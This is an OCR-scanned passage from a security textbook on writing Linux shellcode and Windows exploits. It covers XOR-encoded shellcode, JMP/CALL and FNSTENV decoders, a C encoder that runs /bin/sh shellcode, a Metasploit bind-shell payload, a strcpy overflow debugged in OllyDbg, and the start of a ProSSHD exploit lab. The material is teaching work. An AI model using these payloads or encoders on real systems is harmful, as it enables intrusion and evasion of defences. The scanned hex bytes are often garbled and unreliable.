if one of the inputs is true. If both of the inputs are true, then the result is false. The XOR 
function is interesting because it is reversible, meaning if you XOR a number (bitwise) 
with another number twice, you get the original number back as a result. For example: 

In binary, we can encode 5(101) with the key 4(100) : 101 XOR 100 = 001 

And to decode the number, we repeat with the same key(lOO): 001 XOR 100 = 101 

In this case, we start with the number 5 in binary (101) and we XOR it with a key of 
4 in binary (100). The result is the number 1 in binary (001). To get our original num- 
ber back, we can repeat the XOR operation with the same key (100). 

The reversible characteristics of the XOR function make it a great candidate for en- 
coding and basic encryption. You simply encode a string at the bit level by performing 
the XOR function with a key. Later, you can decode it by performing the XOR function 
with the same key. 
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Structure of Encoded Shellcode 

When shellcode is encoded, a decoder needs to be placed on the front of the shellcode. 
This decoder will execute first and decode the shellcode before passing execution to the 
decoded shellcode. The structure of encoded shellcode looks like this: 

[decoder] [encoded shellcode] 




NOTE It is important to realize that the decoder needs to adhere to the 
same limitations you are trying to avoid by encoding the shellcode in the first 
place. For example, if you are trying to avoid a bad character, say 0x00, then 
the decoder cannot have that byte either. 



JM P/CALL XOR Decoder Example 

The decoder needs to know its own location so it can calculate the location of the en- 
coded shellcode and start decoding. There are many ways to determine the location of 
the decoder, often referred to as "get program counter" (GETPC). One of the most com- 
mon GETPC techniques is the JMP/CALL technique. We start with a JMP instruction 
forward to a CALL instruction, which is located just before the start of the encoded 
shellcode. The CALL instruction will push the address of the next address (the begin- 
ning of the encoded shellcode) onto the stack and jump back to the next instruction 
(right after the original JMP). At that point, we can pop the location of the encoded 
shellcode off the stack and store it in a register for use when decoding. For example: 

BT book # cat jmpcall.asm 



[BITS 32] 






global start 






start : 






jmp short call point 


; 1 . 


JMP to CALL 


begin : 






pop esi 


; 3. 


pop shellcode loc into esi for use in encoding 


xor ecx, ecx 


; 4 . 


clear ecx 


mov cl, 0x0 


; 5 . 


place holder (0x0) for size of shellcode 


short xor: 






xor byte [esi] , 0x0 


; 6. 


XOR byte from esi with key (OxO=placeholder ) 


inc esi 


; 7 . 


increment esi pointer to next byte 


loop short xor 


; 8. 


repeat to 6 until shellcode is decoded 


jmp short shellcode 


; 9. 


jump over call into decoded shellcode 


call point: 






call begin 


; 2. 


CALL back to begin, push shellcode loc on stack 


shellcode : 


; 10 


. decoded shellcode executes 


; the decoded shellcode 


goes 


here . 



You can see the JMP/CALL sequence in the preceding code. The location of the en- 
coded shellcode is popped off the stack and stored in esi. ecx is cleared and the size of 
the shellcode is stored there. For now, we use the placeholder of 0x00 for the size of our 
shellcode. Later, we will overwrite that value with our encoder. Next, the shellcode is 

https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 



Chapter 14: Writing Linux Shellcode 

289 



decoded byte by byte. Notice the loop instruction will decrement ecx automatically on 
each call to LOOP and ends automatically when ecx = 0x0. After the shellcode is de- 
coded, the program JMPs into the decoded shellcode. 

Let's assemble, link, and dump the binary opcode of the program: 



BT book # nasm -f elf jmpcall . asm 
BT book # Id -o jmpcall jmpcall. o 
BT book # objdump -d ./jmpcall 

./jmpcall: file format elf32-i386 

Disassembly of section .text: 

08048080 < start> : 



8048080 


eb 


0d 




jmp 


804808f <call point> 


08048082 <begin>: 










8048082 


5e 






pop 


%esi 


8048083 


31 


c9 




xor 


%ecx, %ecx 


8048085 


bl 


00 




mov 


$0x0 , %cl 


08048087 <short xor>: 








8048087 


80 


36 


00 


xorb 


$0x0, (%esi) 


804808a 


46 






inc 


%esi 


804808b 


e2 


fa 




loop 


8048087 <short xor> 


804808d 


eb 


05 




jmp 


8048094 <shellcode> 


0804808f <call point> 








804808f 


e8 


ee 


ff ff ff 


call 


8048082 <begin> 



BT book # 

The binary representation (in hex) of our JMP/CALL decoder is 



decoder [] = 

" \xeb\x0d\x5e\x31\xc9\xbl\x00\x80\x36\x00\x46\xe2\xfa\xeb\x05 
" \xe8\xee\xf f \xf f \xf f " 



We will have to replace the null bytes just shown with the length of our shellcode 
and the key to decode with, respectively. 

FNSTENV XOR Example 

Another popular GETPC technique is to use the FNSTENV assembly instruction as 
described by noir (see the "References" section). The FNSTENV instruction writes a 
32-byte floating-point unit (FPU) environment record to the memory address specified 
by the operand. 

The FPU environment record is a structure defined as user_fpregs_struct in /usr/ 
include/sys/user.h and contains the members (at offsets): 

• 0 Control word 

• 4 Status word 

• 8 Tag word 

• 12 Last FPU Instruction Pointer 

• Other fields 
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As you can see, the 12 th byte of the FPU environment record contains the extended 
instruction pointer (eip) of the last FPU instruction called. So, in the following exam- 
ple, we will first call an innocuous FPU instruction (FABS), and then call the FNSTENV 
command to extract the EIP of the FABS command. 

Since the eip is located 12 bytes inside the returned FPU record, we will write the 
record 12 bytes before the top of the stack (ESP-0xl2), which will place the eip value at 
the top of our stack. Then we will pop the value off the stack into a register for use dur- 
ing decoding. 



BT book # cat . /f nstenv . asm 
[BITS 32] 



global __start 
start : 



tabs ; 1 . 

fnstenv [esp-Oxc] ;2. 

pop edx ; 3 . 

add dl, 00 ;4. 

(placeholder) 

short_xor_beg : 

xor ecx, ecx ;5. 

mov cl, 0x18 ;6. 

short_xor_xor : 

xor byte [edx], 0x00 ;7. 

inc edx ; 8 . 

loop short_xor_xor ; 9 . 



shellcode : 

; the decoded shellcode goes here 



innocuous FPU instruction 
dump FPU environ, record at ESP-12 
pop eip of fabs FPU instruction to edx 
offset from fabs -> xor buffer 



clear ecx to use for loop 
size of xor'd payload 



the byte to xor with (key placeholder) 
increment EDX to next byte 
loop through all of shellcode 



Once we obtain the location of FABS (line 3 preceding), we have to adjust it to 
point to the beginning of the decoded shellcode. Now let's assemble, link, and dump 
the opcodes of the decoder: 

BT book # nasm -f elf fnstenv. asm 
BT book # Id -o fnstenv fnstenv. o 
BT book # objdump -d ./fnstenv 

./fnstenv2: file format elf32-i386 



Disassembly of section .text: 



08048080 


< start>: 






8048080: 


d9 


el 




8048082: 


d9 


74 


24 f 4 


8048086: 


5a 






8048087: 


80 


c2 


00 


0804808a 


<short xor beg>: 


804808a: 


31 


c9 




804808c: 


bl 


18 





fabs 

fnstenv 0xfffffff4 (%esp) 
pop %edx 

add $0x0, %dl 



xor %ecx, %ecx 

mov $0x18 , %cl 
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0804808e <short_xor_xor> 

804808e : 80 32 00 

8048091: 42 

8048092: e2 fa 

BT book # 

Our FNSTENV decoder can be represented in binary as follows: 

char decoder [] = 

"\xd9\xel\xd9\x74\x24\xf4\x5a\x80\xc2\x00\x31" 

" \xc9\xbl \xl8 \x80\x32\x00\x42 \xe2\xf a" ; 

Putting the Code Together 

We will now put the code together and build a FNSTENV encoder and decoder test 
program: 

BT book # cat encoder. c 
#include <sys/time.h> 

#include <stdlib.h> 

#include <unistd.h> 

int getnumber (int quo) { //random number generator function 

int seed; 

struct timeval tm; 
gettimeofday ( &tm, NULL ); 
seed - tm.tv_sec + tm.tv_usec; 
s random ( seed ); 
return (random () % quo); 

} 

void execute(char *data) { //test function to execute encoded shellcode 

printf ("Executing. . . \n") ; 
int *ret; 

ret = (int *)&ret + 2; 

(*ret) = (int) data; 

} 

void print_code (char *data) { //prints out the shellcode 

int i, 1 = 15; 

for (i =0; i < strlen (data) ; ++i) { 

if (1 >= 15) { 
if (i) 

printf ("\"\n" ) ; 
printf ("\t\ ,,M ) ; 

1 = 0 ; 

} 

++ 1 ; 

printf ( ,, \\x%02x" , ((unsigned char * ) data) [i] ) ; 

} 

printf ("V; \n\n" ) ; 



int main() { //main function 

char shellcode [] = //original shellcode 

"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" 
"\x69\x6e\x89\xe3\x50\x53\x89\xel\xb0\x0b\xcd\x80" ; 



xorb $0x0, (%edx) 
inc %edx 

loop 804808e <short_xor_xor> 
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int count; 

int number = getnumber (200) ; //random number generator 

int badchar = 0; //used as flag to check for bad chars 

int ldecoder; //length of decoder 

int lshellcode = strlen (shellcode) ; //store length of shellcode 

char ^result; 

//simple fnstenv xor decoder, null are overwritten with length and key. 
char decoder [ ] = " \xd9\xel\xd9\x74\x24\xf 4 \x5a\x80\xc2\x00\x31" 

" \xc9\xbl \xl8\x80\x32\x00\x42\xe2\xfa" ; 



printf ("Using the key: %d to xor encode the shellcode\n" , number ) ; 
decoder [9] += 0x14; //length of decoder 

decoder [16] += number; //key to encode with 

ldecoder = strlen (decoder ) ; //calculate length of decoder 

printf (" \nchar original_shellcode [ ] =\n" ); 
print_code (shellcode) ; 

do { //encode the shellcode 

if (badchar == 1) { //if bad char, regenerate key 

number = getnumber (10) ; 
decoder [16] += number; 
badchar = 0; 

} 

for(count=0; count < lshellcode; count++) { //loop through shellcode 
shellcode [count] = shellcode [count] A number; //xor encode byte 
if (shellcode [count] == ' \0 1 ) { // other bad chars can be listed here 
badchar = 1; //set bad char flag, will trigger redo 

} 

} 

} while (badchar == 1); //repeat if badchar was found 

result = malloc (lshellcode + ldecoder); 

strcpy (result, decoder ) ; //place decoder in front of buffer 

strcat (result, shellcode) ; //place encoded shellcode behind decoder 

printf ("\nchar encoded [] =\n" ) ; //print label 

print_code (result) ; //print encoded shellcode 

execute (result ) ; //execute the encoded shellcode 

} 

BT book # 



Now compile the code and launch it three times: 



BT book # gcc -o encoder encoder. c 
BT book # ./encoder 

Using the key: 149 to xor encode the shellcode 
char original_shellcode [ ] = 

"\x31\xc0\x99\x52\x68\x2 i:\x2f\x73\x68\x68\x2 i:\x62\x69\x6e\x8 9" 
"\xe3\x50\x53\x89\xel\xb0\x0b\xcd\x80" ; 

char encoded!] = 

"\xd9\xel\xd9\x74\x24\xf4\x5a\x80\xc2\xl4\x31\xc9\xbl\xl8\x80" 

" \x32\x95\x42 \xe2 \xf a\xa4\x55\x0c\xc7\xfd\xba\xba\xe6\xfd\xfd" 
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"\xba\xf 7\xfc\xfb\xlc\x7 6\xc5\xc6\xlc\x74\x25\x9e\x58\xl5" ; 

Executing . . . 
sh-3.1# exit 
exit 

BT book # ./encoder 

Using the key: 104 to xor encode the shellcode 
char original_shellcode [ ] = 

"\x31\xc0\x99\x52\x68\x2f\x2 i:\x73\x68\x68\x2 i:\x62\x69\x6e\x8 9" 
"\xe3\x50\x53\x89\xel\xb0\x0b\xcd\x80" ; 

char encoded!] = 

"\xd9\xel\xd9\x74\x24\xf4\x5a\x80\xc2\xl4\x31\xc9\xbl\xl8\x80" 

" \x32\x6f \x42 \xe2\xf a\x5e\xaf \xf 6\x3d\x07\x40\x40\xlc\x07\x07" 
"\x40\x0d\x06\x01\xe6\x8c\x3f \x3c\xe6\x8e\xdf \x64\xa2\xef " ; 

Executing . . . 
sh-3.1# exit 
exit 

BT book # ./encoder 

Using the key: 96 to xor encode the shellcode 
char original_shellcode [ ] = 

"\x31\xc0\x99\x52\x68\x2f\x2 i:\x73\x68\x68\x2 i:\x62\x69\x6e\x8 9" 
"\xe3\x50\x53\x89\xel\xb0\x0b\xcd\x80" ; 

char encoded!] = 

"\xd9\xel\xd9\x74\x24\xf4\x5a\x80\xc2\xl4\x31\xc9\xbl\xl8\x80" 

" \x32\x60\x42 \xe2\xf a\x51\xa0\xf 9\x32\x08\x4f \x4f \xl3\x08\x08 " 

"\x4f \x02\x09\x0e\xe9\x83\x30\x33\xe9\x81\xd0\x6b\xad\xe0" ; 

Executing . . . 
sh-3.1# exit 
exit 

BT book # 

As you can see, the original shellcode is encoded and appended to the decoder. The 
decoder is overwritten at runtime to replace the null bytes with length and key, respec- 
tively. As expected, each time the program is executed, a new set of encoded shellcode 
is generated. However, most of the decoder remains the same. 

There are ways to add some entropy to the decoder. Portions of the decoder may be 
done in multiple ways. For example, instead of using the add instruction, we could 
have used the sub instruction. Likewise, we could have used any number of FPU 
instructions instead of FABS. So, we can break down the decoder into smaller inter- 
changeable parts and randomly piece them together to accomplish the same task and 
obtain some level of change on each execution. 



Reference 

"GetPC Code" thread (specifically, use of FNSTENV by noir) 

www.securityfocus.com/archive/82/327100/30/0/threaded 
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Automating Shellcode Generation with 
Metasploit 

Now that you have learned "long division, " let's show you how to use the "calculator. " The 
Metasploit package comes with tools to assist in shellcode generation and encoding. 



Generating Shellcode with Metasploit 

The msfpayload command is supplied with Metasploit and automates the generation 
of shellcode: 



allen@IBM-4B5E8287D50 ~/ framework 
$ ./msfpayload 

Usage: ./msfpayload <payload> 

Payloads : 

bsd_ia32_bind 
bsd_ia32_bind_stg 
bsd_ia32_exec 
... truncated for brevity 
linux_ia32_bind 
linux_ia32_bind_stg 
linux_ia32_exec 
... truncated for brevity 
win32_adduser 
win32_bind 
win32_bind_dllin j ect 
win32_bind_meterpreter 
win32_bind_stg 
... truncated for brevity 



[var=val] <S|C|P|R|X> 



BSD IA32 Bind Shell 

BSD IA32 Staged Bind Shell 

BSD IA32 Execute Command 

Linux IA32 Bind Shell 
Linux IA32 Staged Bind Shell 
Linux IA32 Execute Command 

Windows Execute net user /ADD 
Windows Bind Shell 
Windows Bind DLL Inject 
Windows Bind Meterpreter DLL Inject 
Windows Staged Bind Shell 



Notice the possible output formats: 

• S Summary to include options of payload 

• C C language format 

• P Perl format 

• R Raw format, nice for passing into msfencode and other tools 

• X Export to executable format (Windows only) 

We will choose the linux_ia32_bind payload. To check options, simply supply 
the type: 

allen@IBM-4B5E8287D50 ~/ framework 
$ ./msfpayload linux_ia32_bind 

Name: Linux IA32 Bind Shell 
Version: $Revision: 1638 $ 

OS/CPU: linux/x86 
Needs Admin: No 
Multistage: No 
Total Size: 84 

Keys : bind 
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Provided By: 

skape Cmiller [at] hick.org> 
vlad902 <vlad902 [at] gmail.com> 

Available Options: 

Options: Name Default Description 



required LPORT 4444 Listening port for bind shell 

Advanced Options: 

Advanced (Msf : : Payload: : linux_ia32_bind) : 



Description : 

Listen for connection and spawn a shell 



Just to show how, we will change the local port to 3333 and use the C output format: 

allen0 IBM-4B5E8287D50 '/framework 
$ ./msfpayload linux_ia32_bind LPORT=3333 C 

"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xel\xcd\x80\x96" 
"\x43\x52\x66\x68\x0d\x05\x66\x53\x89\xel\x6a\x66\x58\x50\x51\x56" 
"\x89\xel\xcd\x80\xb0\x66\xdl\xe3\xcd\x80\x52\x52\x56\x43\x89\xel" 
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f \xcd\x80\x49\x79\xf 9\xb0" 
"\x0b\x52\x68\x2f \x2f \x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" 
"\x89\xel\xcd\x80"; 



Wow, that was easy! 



Encoding Shellcode with Metasploit 

The msfencode tool is provided by Metasploit and will encode your payload (in raw 
format): 

$ ./msfencode -h 



Usage : 
Options : 



./msfencode <options> [var=val] 



-i <file> 

-a <arch> 

-o <os> 

-t <type> 

-b <chars> 

-s <size> 

-e <encoder> 
-n <encoder> 
-1 



Specify the file that contains the raw shellcode 
The target CPU architecture for the payload 
The target operating system for the payload 
The output type: perl, c, or raw 
The characters to avoid: ' \xOO\xFF' 

Maximum size of the encoded data 
Try to use this encoder first 
Dump Encoder Information 
List all available encoders 



Now we can pipe our msfpayload output in (raw format) into the msfencode tool, 
provide a list of bad characters, and check for available encoders (-1 option). 

allen@IBM-4B5E8287D50 ~/ framework 

$ ./msfpayload linux_ia32_bind LPORT=3333 R | ./msfencode -b ' \x00' -1 

Encoder Name Arch Description 

...truncated for brevity 
JmpCallAdditive x86 



Jmp/Call XOR Additive Feedback Decoder 
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PexAlphaNum 


x86 


Skylined's alphanumeric encoder ported to perl 


PexFn s tenvMo v 


x86 


Variable- length 


fnstenv/mov dword xor 


encoder 


PexFnstenvSub 


x86 


Variable- length 


fnstenv/sub dword xor 


encoder 


ShikataGaNai 


x86 


You know what I ' 


'm saying, baby 





We will select the PexFnstenvMov encoder, as we are most familiar with that: 

allen@IBM-4B5E8287D50 ~/ framework 

$ ./msfpayload linux_ia32_bind LPORT=3333 R | ./msfencode -b ' \x00' -e 
PexFnste nvMov -t c 

[*] Using Msf :: Encoder :: PexFnstenvMov with final size of 106 bytes 
" \x6a\xl5\x59\xd9\xee\xd9\x74\x24\xf 4\x5b\x81\x73\xl3\xbb\xf 0\x41" 

" \x88\x83\xeb\xf c\xe2\xf 4\x8a\x2b\xl2\xcb\xe8\x9a\x43\xe2\xdd\xa8" 

" \xd8\x01\x5a\x3d\xcl\xle\xf 8\xa2\x27\xe0\xb6\xf 5\x27\xdb\x32\xll" 

" \x2b\xee\xe3\xa0\xl0\xde\x32\xll\x8c\x08\x0b\x96\x90\x6b\x76\x70" 
n \xl3\xda\xed\xb3\xc8\x69\x0b\x96\x8c\x08\x28\x9a\x43\xdl\x0b\xcf " 

" \x8c\x08\xf2\x89\xb8\x38\xb0\xa2\x29\xa7\x94\x83\x29\xe0\x94\x92" 
M \x28\xe6\x32\xl3\xl3\xdb\x32\xll\x8c\x08" ; 

As you can see, that is much easier than building your own. There is also a web in- 
terface to the msfpayload and msfencode tools. We will leave that for other chapters. 



References 

"About Unix Shellcodes" (Philippe Biondi) www.secdev.org/conf/shellcodes, 
syscan04.pdf 

JMP/CALL and FNSTENV decoders www.klake.org/~jt/encoder/#decoders 
Metasploit www.metasploit.com 
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Windows Exploits 



CHAPTER 



Up to this point in the book, we've been using Linux as our platform of choice because 
it's easy for most people interested in hacking to get hold of a Linux machine for ex- 
perimentation. Many of the interesting bugs you'll want to exploit, however, are on the 
more-often-used Windows platform. Luckily, the same bugs can be exploited largely 
the same way on both Linux and Windows because they are both driven by the same 
assembly language underneath the hood. So in this chapter, we'll talk about where to 
get the tools to build Windows exploits, show you how to use those tools, and then 
show you how to launch your exploit on Windows. 

In this chapter, we cover the following topics: 

• Compiling and debugging Windows programs 

• Writing Windows exploits 

• Understanding structured exception handling (SEH) 

• Understanding Windows memory protections 

• Bypassing Windows memory protections 



Compiling and Debugging Windows Programs 

Development tools are not included with Windows, but that doesn't mean you need to 
spend $1,000 for Visual Studio to experiment with exploit writing. (If you have it 
already, great — feel free to use it for this chapter.) You can download for free the same 
compiler that Microsoft bundles with Visual Studio 2010 Express. In this section, we'll 
show you how to set up your Windows exploit workstation. 



Compiling on Windows 

The Microsoft C/C++ Optimizing Compiler and Linker are available for free from www 
.microsoft.com/express/download/. Select the Visual C++ 2010 Express option. After a 
quick download and a straightforward installation, you'll have a Start menu link to the 
Visual C++ 2010 Express edition. Click the shortcut to launch a command prompt with its 
environment configured for compiling code. To test it out, let's start with hello.c and then 
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the meet.c example we introduced in Chapter 10 and exploited in Linux in Chapter 11 . 
Type in the example or copy it from the Linux machine you built it on earlier: 

C : \grayhat>type hello. c 
//hello . c 

#include <stdio.h> 
main ( ) { 

printf ( "Hello haxor") ; 

} 

The Windows compiler is cl.exe. Passing the name of the source file to the compiler 
generates hello.exe. (Remember from Chapter 10 that compiling is simply the process 
of turning human-readable source code into machine-readable binary files that can be 
digested by the computer and executed.) 

C : \grayhat>cl hello. c 

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 16.00.30319.01 for 80x86 
Copyright (C) Microsoft Corporation. All rights reserved, 
hello . c 

Microsoft (R) Incremental Linker Version 10.00.30319.01 
Copyright (C) Microsoft Corporation. All rights reserved. 

/ out : hello . exe 
hello . obj 

C : \grayhat>hello . exe 
Hello haxor 

Pretty simple, eh? Let's move on to build the program we are familiar with, meet.exe. 
Create meet.c from Chapter 10 and compile it on your Windows system using cl.exe: 

C : \grayhat>type meet.c 
/ /meet . c 

#include <stdio.h> 

greeting (char *templ, char *temp2) { 
char name [400]; 
strcpy(name, temp2); 

printf ("Hello %s %s\n", tempi, name); 

} 

main(int argc, char *argv[]){ 

greeting (argv [ 1 ] , argv[2]); 

printf ("Bye %s %s\n", argv[l], argv[2]); 

} 

C : \grayhat>cl meet.c 

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 16.00.30319.01 for 80x86 
Copyright (C) Microsoft Corporation. All rights reserved, 
meet . c 

Microsoft (R) Incremental Linker Version 10.00.30319.01 
Copyright (C) Microsoft Corporation. All rights reserved. 

/ out :meet . exe 
meet . obj 

C : \grayhat>meet . exe Mr. Haxor 
Hello Mr. Haxor 
Bye Mr. Haxor 
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Windows Compiler Options 

If you type cl.exe /?, you'll get a huge list of compiler options. Most are not interesting 
to us at this point. The following table lists and describes the flags you'll be using in this 
chapter. 



Option Description 

/ Zi Produces extra debugging information, which is useful when using the Windows 

debugger (demonstrated later in the chapter). 

/ Fe Similar to gee’s -o option. The Windows compiler by default names the executable 

the same as the source with .exe appended. If you want to name it something 
different, specify this flag followed by the exe name you’d like. 

/GS[ — ] The IGS flag is on by default starting with Microsoft Visual Studio 2005 and 

provides stack canary protection. To disable it for testing, use the IGS- flag. 

Because we're going to be using the debugger next, let's build meet.exe with full 
debugging information and disable the stack canary functions: 




NOTE The IGS switch enables Microsoft’s implementation of stack canary 
protection, which is quite effective in stopping buffer overflow attacks. To learn 
about existing vulnerabilities in software (before this feature was available), we 
will disable it with the IGS- flag. Later in this chapter, we will bypass the IGS 
protection. 



C : \grayhat>cl /Zi /GS- meet.c 

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 16.00.30319.01 for 80x86 
Copyright (C) Microsoft Corporation. All rights reserved, 
meet . c 

Microsoft (R) Incremental Linker Version 10.00.30319.01 
Copyright (C) Microsoft Corporation. All rights reserved. 

/out :meet . exe 
/debug 
meet . obj 

C : \grayhat>meet Mr Haxor 
Hello Mr Haxor 
Bye Mr Haxor 

Great, now that you have an executable built with debugging information, it's time 
to install the debugger and see how debugging on Windows compares to the Unix de- 
bugging experience. 



Debugging on Windows with OllyDbg 

A popular user-mode debugger is OllyDbg, which you can find at www.ollydbg.de. At 
the time of this writing, version 1 . 10 is the stable version and is used in this chapter. As 
you can see in Figure 15-1, the OllyDbg main screen is split into four sections. The 
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BE® 



OllyDbg pert. cju: 



►Jill iillil *1 Ml lJlJ»!lXlg|aJ cJzJKlljRjdlJ Iil3j7j 



Figure 1 5- 1 Main screen of OllyDbg 



Code section is used to view assembly of the binary. The Registers section is used to 
monitor the status of registers in real time. The Hex Dump section is used to view the 
raw hex of the binary. The Stack section is used to view the stack in real time. Each 
section has a context-sensitive menu available by right-clicking in that section. 

You may start debugging a program with OllyDbg in any of three ways: 

• Open OllyDbg and choose File | Open. 

• Open OllyDbg and choose File | Attach. 

• Invoke it from the command line — for example, from a Metasploit shell — as 
follows: 

$ruby -e "exec ' <path to olly>', 'program to debug', ' <arguments> ' " 

For example, to debug our favorite meet.exe program and send it 408 A's, simply type 

$ruby -e "exec ' cygdrive/c/odbgllO/ollydbg .exe ' , ' c : \grayhat\meet .exe ' , 'Mr 1 , ( ' A' *408) " 

The preceding command line will launch meet.exe inside of OllyDbg. 
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He OllyObg • mert.exe 
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PUSH 14 
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EE#' 0O2OFD28 

EIP 00941508 
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When learning OllyDbg, you will want to know the following common com- 
mands: 



Shortcut 


Purpose 


F2 


Set breakpoint (bp) 


F7 


Step into a function 


F8 


Step over a function 


F9 


Continue to next bp, exception, or exit 


CTRL-K 


Show call tree of functions 


SHIFT-F9 


Pass exception to program to handle 


Click in code section and press ALT-E 


Produce list of linked executable modules 


Right-click register value and select 
Follow in Stack or Follow in Dump 


Look at stack or memory location that corresponds to 
register value 


CTRL-F2 


Restart debugger 



When you launch a program in OllyDbg, the debugger automatically pauses. This 
allows us to set breakpoints and examine the target of the debugging session before 
continuing. It is always a good idea to start off by checking what executable modules 
are linked to our program (alt-e). 
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1 Path 
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Ci'vfoo^P'ieet.exe 






75C290O0 0004PO00 75C27P90 KERNEL BP 


6.1.76TO. 16385 


C: Uindous\«yst™32\KERhELBPSE.dl l 






^-■:r.w- mv.r j.uvi 762610C5 kerne 132 


6. 1.7600. 16385 


C:\y indous''syst^32Nkerne 132. dl 1 




0T 94 17. 


7705900© 001X000 ntdl l 


6.1.7600.16385 


C : \y i n dows\SVSTEM32\ntd 1 1 . d U 





In this case, we see that only kernel32.dll and ntdll.dll are linked to meet.exe. This in- 
formation is useful to us. We will see later that those programs contain opcodes that are 
available to us when exploiting. 
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Now we are ready to begin the analysis of this program. Since we are interested in 
the strcpy in the greeting() function, let's find it by starting with the Executable Mod- 
ules window we already have open (alt-e). Double-click on the meet module and you 
will be taken to the function pointers of the meet.exe program. You will see all the func- 
tions of the program, in this case greeting and main. Arrow down to the JMP meet, 
greeting line and press enter to follow that JMP statement into the greeting function. 



OtlyObg - m«t 

File View Debug Plugmt Options Window 

b)«Jx] ►Jjjj w-JiiJ =dl 



® CPU thread, module meet 



C ] CPU • mein three d, module meet 

S 

eoxteos i - E9 itooeeoe 

I-C9 51000000 

COMiOOf CC 

00^*1010 S 

MM4I011 9 



JP wtl.trMl u»« 





NOTE If you do not see the symbol names such as greeting, strcpy, and 
printf, then either you have not compiled the binary with debugging symbols 
or your OllyDbg symbols server needs to be updated. If you have installed 
Microsoft Debugging Tools for Windows (see the “Reference” section), you 
may fix this by copying the dbghelp.dll and symsrv.dll files from your Microsoft 
Windows debugger directory to the OllyDbg folder.This lack of symbol names 
is not a problem; they are merely there as a convenience to the user and can 
be worked around without symbols. 



Now that we are looking at the greeting() function, let's set a breakpoint at the vul- 
nerable function call (strcpy). Arrow down until you get to line 0x00401034. At this 
line, press f 2 to set a breakpoint; the address should turn red. Breakpoints allow us to 
return to this point quickly. For example, at this point we will restart the program with 
CTRL-F2 and then press f 9 to continue to the breakpoint. You should now see that Ol- 
lyDbg has halted on the function call we are interested in (strcpy) . 




NOTE The addresses presented in this chapter may vary on your system; 
follow the techniques, not the particular addresses. 



Now that we have a breakpoint set on the vulnerable function call (strcpy), we can 
continue by stepping over the strcpy function (press fs). As the registers change, you 
will see them turn red. Since we just executed the strcpy function call, you should see 
many of the registers turn red. Continue stepping through the program until you get to 
line 0x00401057, which is the RETN instruction from the greeting function. Notice 
that the debugger realizes the function is about to return and provides you with useful 
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information. For example, since the saved eip has been overwritten with four A's, the 
debugger indicates that the function is about to return to 0x41414141. Also notice how 
the function epilog has copied the address of ebp into esp and then popped the value 
off the stack (0x41414141) into ebp. 




As expected, when you press F8 one more time, the program will fire an exception. 
This is called a first chance exception because the debugger and program are given a 
chance to handle the exception before the program crashes. You may pass the exception 
to the program by pressing SHIFT-F9. In this case, since there are no exception handlers 
provided within the application itself, the OS exception handler catches the exception 
and crashes the program. 

After the program crashes, you may continue to inspect memory locations. For 
example, you may click in the stack window and scroll up to see the previous stack 
frame (that we just returned from, which is now grayed out). You can see (on our sys- 
tem) that the beginning of our malicious buffer was at 0x002DFB34. 
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To continue inspecting the state of the crashed machine, within the stack window, 
scroll back down to the current stack frame (the current stack frame will be highlight- 
ed). You may also return to the current stack frame by selecting the ESP register value 
and then right-clicking on that selected value and choosing Follow in Stack. You will 
notice that a copy of the buffer is also located at the location esp+4. Information like 
this becomes valuable later as we choose an attack vector. 





Registers IFRV' 


<<<<<<<<< 








Note:The current stack frame is highlighted; 
the previous stack frame is grayed out. 



,~1 1 1(»0 
001 11003 ASCII 
•002CF01C 

00941482 RETURN to n**t. 0094 1482 fron rw«t. 

1 -11 19,11 11 | 

00111080 



41000 



As you can see, OllyDbg is easy to use. 



Reference 

Microsoft Debugging Tools for Windows 

www. microsoft.com/whdc/ devtools/ debugging/ default, mspx 

Writing Windows Exploits 

For the rest of this chapter, you may either use the Ruby command shell, as in the previ- 
ous section, or download and install Ruby for Windows from http://mbyinstaller.org 
(we used version 1.8.7-p249). We will find both useful and will switch back and forth 
between them as needed. 

In this section, we will use a variant of OllyDbg, called Immunity Debugger (see the 
"References" section), and Metasploit to build on the Linux exploit development pro- 
cess you previously learned. Then, we will teach you how to go from a vulnerability 
advisory to a basic proof of concept exploit. 



NOTE OllyDbg only works in user space. If you need to dive into kernel 
space, you will have to use another debugger likeWinDbg or SoftICE. 




NOTE If you are comfortable using OllyDbg (and you should be by now), 
then you will have no problem with Immunity Debugger as the functionality is 
the same, with the exception of a Python-based shell interface that has been 
added inside the debugger to allow for automation of mundane tasks. We used 
version vl.73 for the rest of the chapter. 
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Exploit Development Process Review 

Recall from Chapter 11 that the exploit development process is as follows: 

• Control eip 

• Determine the offset(s) 

• Determine the attack vector 

• Build the exploit sandwich 

• Test the exploit 

• Debug the exploit if needed 

ProSSHD Server 

The ProSSHD server is a network SSH server that allows users to connect "securely" and 
provides shell access over an encrypted channel. The server runs on port 22. In 2010, an 
advisory was released that warned of a buffer overflow for a post-authentication action. 
This means the user must already have an account on the server to exploit the vulner- 
ability. The vulnerability may be exploited by sending more than 500 bytes to the path 
string of an SCP GET command. 




At this point, we will set up the vulnerable ProSSHD vl.2 server (found at the refer- 
ences -exploit db) on a VMware guest virtual machine. We will use VMware because it 
allows us to start, stop, and restart our virtual machine much quicker than rebooting. 




CAUTION Since we are running a vulnerable program, the safest way to 
conduct testing is to place the virtual NIC of VMware in host-only networking 
mode. This will ensure that no outside machines can connect to our vulnerable 
virtual machine. See the VMware documentation (www.vmware.com) for more 
information. 



Inside the virtual machine, install and start the Configuration tool for ProSSHD 
from the Start menu. After the Configuration tool launches, as shown next, click the 
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Run menu on the left and then click the Run as exe button on the right. If you need to 
restart it, you may need to switch between the ComSetup and Run menus to refresh the 
screen. You also may need to click Allow Connection if your firewall pops up. 



■*1 Settings (60 minutes evaluation license...) XWP.im 


f^T ® 1*3 


File Help About Close 





ComS etup 



Run 

XwpSSHD service 

Service name : XWP SSH server 

Install 

Properties: Windows Firewall 

Startup type: 



Now that the server is running, you need to determine the IP address of the vulner- 
able server and ping the vulnerable virtual machine from the host machine. In our case, 
the vulnerable virtual machine is located at 10.10.10.143. 

Next, inside the virtual machine, open Immunity Debugger. You may wish to adjust 
the color scheme by right-clicking in any window and selecting Appearance | Colors 
(All) and then choosing from the list. Scheme 4 is used for the examples in this section 
(white background). 

At this point (the vulnerable application and the debugger running on a vulnera- 
